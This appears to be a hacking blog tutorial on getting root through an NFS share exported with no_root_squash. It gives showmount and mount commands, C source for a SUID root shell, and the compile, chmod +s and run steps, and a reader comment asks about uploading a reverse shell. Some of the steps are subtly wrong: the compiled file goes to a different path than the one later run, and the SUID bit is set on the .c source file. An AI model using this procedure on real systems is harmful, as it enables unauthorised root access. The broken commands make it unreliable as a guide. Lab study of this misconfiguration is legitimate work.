If you have a Low privilege Shell on any machine and you found that a machine has an NFS share you might be able to use that to escalate privileges. Depending on how it is configured. Let’s take a tour to understand Weak permission on NFS server.
Index
-
- What is NFS?
- What is root_sqaush and no_root_sqaush?
- Required Tools and Program FIle.
- Exploit NFS Weak Permission.
What is NFS?
The Network File System (NFS) is a client/server application that lets a computer user view and optionally store and update files on a remote computer as though they were on the user’s own computer. The NFS protocol is one of several distributed file system standards for network-attached storage (NAS).
What is root_sqaush and no_root_sqaush?
Root Squashing(root_sqaush) parameter prevents having root access to remote root users connected to NFS volume. Remote root users are assigned a user “nfsnobody” when connected, which has the least local privileges. Alternatively “no_root_squash“ option turns off the “squashing of root user” and gives the remote user root access to the connected system. System administrators should always use “root_squash” parameter when configuring NFS drives to make sure remote root users are always “squashed”.
NOTE : For Exploiting this issue NFS must be configured with no_root_sqaush.
Required Tools and Program FIle.
This list is very short u just need a showmount, mount with nfs support.
- showmount
- mount
- C Program FIle or ( optional )
For installing required commands(Debian based):
apt-get install nfs-common apt-get install cifs-utils
Program File(suid-shell.c):
#include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> int main() { setuid(0); system("/bin/bash"); return 0; }
Exploit NFS and Get Root Shell.
now, that I had limited shell so take a look at “/etc/exports” file. /etc/exports file contains configurations and permissions of which folders/file systems are exported to remote users.
So /tmp folder is shareable and remote user can mount it. let’s take a look on NFS configuration flags we have “rw” (Read, Write), “sync” and “no_root_squash” parameter which is not secure and we already talked about what is Root Squashing.
Attacker Machine.
1. Open command prompt and type showmount -e [Linux VM IP Address]
2. Make a Directory to mount remote system.
mkdir /tmp/test
3. Mount Remote /tmp folder on our /tmp/test:
mount -o rw,vers=2 [Linux VM IP Address]:/tmp /tmp/test
4. Drop our c program file.
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/test/suid-shell.c
4. Compile:
gcc /tmp/test/suid-shell.c -o /tmp/1/suid-shel
5. Set SUID bit
chmod +s /tmp/test/suid-shell.c
Victim Low Privilege Shell
I get back to my low privilege shell user access on the victim server, all I had to do is to execute the suid-shell shell in /tmp folder.
cd /tmp
./suid-shell
Got Root… YaaaHoooo…
Thanks For Reading. Any Feeback please Share in the comment section. 😉
Happy Hacking.
I have a question, that I was looking to answer for quite some time. I am going through metasploitable and currently exploring NFS shares. My configuration file for NFS looks exacly like yours. I have gone through the steps of mounting and browsing the shares, I can create and copy files from my host. Question is: why if I upload a reverse shell back to, when executed I am basically pwning myself instead of a target ? I must be missing something…
this is post exploit for exploiting this issue your need a any level(privilege low or high) on target. first mount target in your system and upload reverse shell, add permission and go to your initial shell and execute.